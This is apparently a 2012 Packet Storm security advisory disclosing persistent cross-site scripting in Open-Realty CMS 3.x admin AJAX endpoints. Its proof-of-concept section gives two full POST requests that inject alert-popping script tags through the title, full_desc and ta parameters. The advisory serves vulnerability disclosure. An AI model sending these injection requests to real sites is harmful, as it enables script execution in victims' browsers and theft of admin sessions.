Open-Realty CMS 3.x Cross Site Scripting

2012-12-26T00:00:00
ID PACKETSTORM:119106
Type packetstorm
Reporter Aung Khant
Modified 2012-12-26T00:00:00

Description

                                        
                                            `1. OVERVIEW  
  
Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site  
Scripting (XSS).  
  
  
2. BACKGROUND  
  
Open-Realty is the world's leading real estate listing marketing and  
management CMS application, and has enjoyed being the real estate web  
site software of choice for professional web site developers since  
2002.  
  
  
3. VULNERABILITY DESCRIPTION  
  
Multiple parameters are not properly sanitized, which allows attacker  
to conduct Cross Site Scripting attack. This may allow an attacker to  
create a specially crafted URL that would execute arbitrary script  
code in a victim's browser.  
  
  
4. VERSIONS AFFECTED  
  
3.x  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
/admin/ajax.php (parameter: title, full_desc, ta)  
  
///////////////////////////////////////////////////////  
  
POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1  
Host: localhost  
Content-Length: 574  
Origin: http://localhost  
X-Requested-With: XMLHttpRequest  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;  
  
edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2&notes=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate=  
  
///////////////////////////////////////////////////////  
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1  
Host: localhost  
Proxy-Connection: keep-alive  
Content-Length: 112  
Origin: http://localhost  
X-Requested-With: XMLHttpRequest  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/admin/index.php?action=edit_blog_post&id=65  
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;  
  
blogID=65&title=about+us&ta='"><script>alert('Error')</script>&description=&keywords=&status=1&seotitle=about-us  
///////////////////////////////////////////////////////  
  
  
6. SOLUTION  
  
The vendor has not responded to the report since 2012-11-17.  
It is recommended that an alternate software package be used in its place.  
  
  
7. VENDOR  
  
Transparent Technologies Inc.  
http://www.transparent-support.com  
  
  
8. CREDIT  
  
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2012-11-17: Vulnerability Reported  
2012-12-25: Vulnerability Disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss  
Open-Realty Home Page: http://www.open-realty.org/  
  
  
#yehg [2012-12-25]  
  
---------------------------------  
Best regards,  
YGN Ethical Hacker Group  
Yangon, Myanmar  
http://yehg.net  
Our Lab | http://yehg.net/lab  
Our Directory | http://yehg.net/hwd  
`